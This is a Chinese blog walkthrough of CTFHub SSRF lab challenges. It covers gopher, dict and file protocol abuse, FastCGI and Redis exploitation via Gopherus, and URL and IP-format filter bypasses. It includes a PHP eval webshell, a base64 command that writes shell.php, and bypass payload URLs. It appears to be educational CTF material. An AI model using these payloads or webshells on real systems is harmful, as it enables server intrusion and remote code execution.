CTFHub技能树-SSRF

原创 已于 2024-07-28 16:19:48 修改 · 1.7k 阅读 · 29 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据挖掘

于 2024-07-24 20:58:21 首次发布

内网访问

url=http://127.0.0.1/flag.php

直接访问就行

伪协议读取文件

网站的根目录一般都是在/var/www/html下
使用file:///协议

查看页面源代码就能看到

端口扫描

端口扫描一般都使用dict伪协议

bp爆破端口

1.url=dict://127.0.0.1:80打开bp进行抓包

2.修改数据然后攻击

3.寻找不一样的数据

4.访问端口就找到了

POST请求

1.访问127.0.0.1/flag.php

2.查看页面源代码

3.将页面源代码中的key输到框中并抓包

4.将抓到的数据包进行编码

5.将编码后数据中的%0A全都换成%0D%0A并在末尾手动加%0D%0A,然后再进行编码

6.将二次编码后的数据贴到gopher://127.0.0.1:80/_后就能得到

上传文件

1.http://127.0.0.1/flag.php发现没有提交按钮,fn+f12后在查看器下面的代码中单击鼠标右键编辑HTML添加<input type="submit" name="submit">代码

2.随便选一个不为空且不是很大的文件在提交时抓包

3.修改为

4.将修改完的数据进行二次编码

FastCGI协议

1.使用gopherus工具分别执行如下命令

python2 gopherus.py --exploit fastcgi
/var/www/html/index.php
echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php

2.将数据进行编码后贴在url后

3.然后查看shell.php

4.菜刀右击添加

Redis协议

1.使用gopherus工具分别执行如下命令

python2 gopherus.py --exploit redis

PHPShell

<?php @eval($_POST["cmd"]);?>

2.编码

3.查看shell.php

4.?cmd=('ls');

5.ls / 查看

6.找到flag文件后cat /查看内容

URL Bypass

请求的URL中必须包含http://notfound.ctfhub.com

我们就可以利用@符号绕过

​​​​​​http://notfound.ctfhub.com@127.0.0.1/flag.php

数字IP Bypass

127.0.0.1的十进制:2130706433

127.0.0.1的十六进制:0x7F000001

302跳转 Bypass

使用localhost也是一样的道理

?url=localhost/flag.php

DNS重绑定 Bypass

url=指定域名/flag.php,成功得到flag。

CTF技能树
qq_38158710的博客
04-15 963
CTH技能树 持续更新中。。。。。。 WEB前置技能 ——HTTP协议 请求方式 HTTP Method is GET Use CTF**B Method, I will give you flag. Hint: If you got 「HTTP Method Not Allowed」 Error, you should request index.php. BurpSuite解法 挂上BurpSuite,重新打开题目 直接放过拦截到的第一个包如下图 拦截到的第二个包如下图 将拦截到的第二个包的GET改为
CTFHub技能树 Web-SSRF篇(保姆级通过全攻略)
2301_76631050的博客
07-24 1170
要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS Serve在我们的可控的DNS Server上编写解析服务,设置TTL时间为0,这是为了防止有DNS服务器对解析结果进行缓存。步骤三:将HTTP头部的Host字段修改为127.0.0.1:80然后就是老操作... url编码一次在把%0A换成 %0D%0A 并且末尾要加上%0D%0A,然后再对url进行第二次编码....如下。步骤三:将其中的%0A 替换成%0D%0A 并且末尾要加上%0D%0A。
CTFHub技能树-ssrf通关攻略
最新发布
2301_77839771的博客
07-17 1720
得到包以后我们需要像上面一样进行修改然后进行url编码,我们需要二次编码需要先修改文件格式将编码后数据中的%0A全都换成%0D%0A并在末尾手动加%0D%0A,然后再进行编码将二次编码后的数据贴后访问就能得到flag。我们需要二次编码需要先修改文件格式将编码后数据中的%0A全都换成%0D%0A并在末尾手动加%0D%0A,然后再进行编码将二次编码后的数据贴后访问就能得到。需要我们访问得到位于web目录下的flag.php,所以访问file:///var/www/html/flag.php即可。
ctfhub技能树ssrf
Naptmn的博客
02-16 585
文章目录1、内网访问 1、内网访问 内网访问要求我们从特定的服务器发送请求才能读取到信息,根据题目要求可以知道要求我们从127.0.0.1访问flag.php 打开题目之后可以看到网址上的url=_ 于是我们构造如下url即可得到flag ...
CTFHUB技能树——SSRF(一)
2401_82985722的博客
05-21 1924
大多是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。(7)从URL关键字中寻找(share、wap、url、link、src、source、target、u、display、sourceURl、imageURL、domain)(1)可以对外网、内网、本地进行端口扫描,某些情况下端口的Banner会回显出来(比如3306的);(5)使用file:///协议读取本地文件(或其他协议)
CTFHub技能树 Web-SSRF
2301_80176211的博客
08-27 283
进入技能书,找到WEB-SSRF
CTFHub技能树 Web-SSRF系列通过全技巧(已完结)
m0_59151303的博客
07-24 1478
第二步:选择一个文件上传,点击提交查询并用Burp Suite抓包,修改包内容,右击发送到Reperter,打开重放器,发现有中文乱码,修改中文乱码为“提交“,点击发送,发现Content-Length:的长度改变。第三步:用在线工具对修改后包进行URL编码,将编码后内容的%0A替换成%0D%0A并且在末尾再加一个%0D%0A,对替换后的内容再进行URL编码。第三步:用在线工具进行URL编码,将编码后内容的%0A替换成%0D%0A并且在末尾再加一个%0D%0A,对替换后的内容再进行URL编码。
[CTFHub技能树]SSRF漏洞关卡详解!
muyuchen110的博客
07-24 1183
CTFHUB技能树是一个全面、‌详细且易于理解的网络安全学习资源,‌旨在帮助学习者系统地掌握网络安全领域的各种技能。‌它涵盖了从基础到进阶的多个方面,‌包括但不限于Web安全、‌数据库安全、‌网络协议等。‌
CTFHUB技能树-SSRF-redis协议踩坑
u011250160的博客
01-03 724
在gopherus上面输入命令:python gophers.py --exploit redis。虽然蚁剑连接不上但可以用url+shell?cmd=ls / 获取flag。然后文件名过长好像是被截断导致文件后缀少了一个p。如果是get传参需要再进行一次url编码。将自动生成的代码url解密可以得到。文件名最好还是用shell.php。我测试了s.php但文件没内容。接下来看可以连接蚁剑的代码。system修改为eval。
CTFhub技能树ssrf
cjchsh的博客
03-07 784
CTFhub技能树ssrf
CTF技能树,为初学者的一个认识ctf
10-22
ctf的一个树状图而已
CTHub 技能树
m0_75036923的博客
08-13 457
CTHub 技能树
CTFHUB--技能树--SSRF全解(上篇)
errorr0
05-11 2555
SSRF技能树
CTFhub技能树SSRF
weixin_51614272的博客
03-06 5834
目录第一部分内网访问伪协议读取文件端口扫描第二部分POST请求上传文件FastCGI协议Redis协议第三部分URL数字IP302跳转DNS重绑定 第一部分 内网访问 构造payload: /?url=http://127.0.0.1/flag.php 伪协议读取文件 这里使用file协议,构造payload: /?url=file:///var/www/html/flag.php 打开源码即得flag 端口扫描 据说端口范围是8000-9000哦。 直接用burpsuite无脑暴力爆破哇,立马得出
CTFHUB技能树详解(最全、最细、最易懂)
热门推荐
it_wzb的博客
09-29 1万+
最近闲的无聊,玩玩CTF吧,并把自己的解题思路分享给大家。大佬多指教。
CTFHub技能树--SSRF攻略
qq_68186313的博客
07-24 1136
CTFHub技能树--SSRF攻略
CTFHub技能树 Web-SSRF篇(保姆级通过教程)
weixin_45808483的博客
11-10 8866
第一部分(Http、Dict和file等协议的利用) 内网访问 尝试访问位于127.0.0.1的flag.php吧 我们是从目标主机内网环境访问它本地的flag.php,我们构建url: /?url=http://127.0.0.1/flag.php 图中我们可以看出访问成功了。 为协议读取文件 尝试去读取一下Web目录下的flag.php吧 我们尝试直接访问,发现访问不到。 既然是伪协议访问,我们先了解一下url伪协议: 类型 file:/// dict..
ctfhub技能书ssrf
02-25
### CTFHub 技能书 SSRF 相关内容 #### 什么是SSRF漏洞 服务器端请求伪造(Server-Side Request Forgery, SSRF)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。通常情况下,服务器会根据用户输入的部分...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值